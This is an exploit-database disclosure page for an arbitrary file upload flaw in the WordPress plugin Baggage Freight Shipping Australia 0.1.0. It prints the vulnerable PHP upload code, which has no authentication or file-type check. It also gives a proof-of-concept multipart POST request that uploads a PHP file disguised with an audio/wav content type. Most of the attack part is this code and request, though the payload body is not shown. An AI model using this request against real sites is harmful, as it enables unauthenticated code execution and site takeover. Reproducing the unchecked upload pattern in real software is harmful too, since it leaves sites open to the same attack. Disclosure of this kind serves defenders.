WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload

2018.12.29

the Machiavellian (DZ)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: none

Exploit Title : WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload
Exploit Author : The Mechiavellian
Exploit Author Facebook : 
Vendor Homepage || software link : https://wordpress.org/plugins/baggage-freight/
Version : 0.1.0
Unrestricted file upload for unahtorized user in package info upload 

 
>Vulnerable code in upload-package.php:
if($_POST["submit"])
{
    if ($_FILES["file"])
    {
        $uploadpath = "../wp-content/plugins/baggage_shipping/upload/".time()."_".$_FILES["file"]["name"];
 
        move_uploaded_file($_FILES["file"]["tmp_name"],$uploadpath);
 
poc :
 
POST /wp-content/plugins/baggage-freight/upload-package.php HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=---------------------------18311719029180117571501079851
...
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="submit"
 
1
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="file"; filename="file.php"
Content-Type: audio/wav
 

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload

Dork: none

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.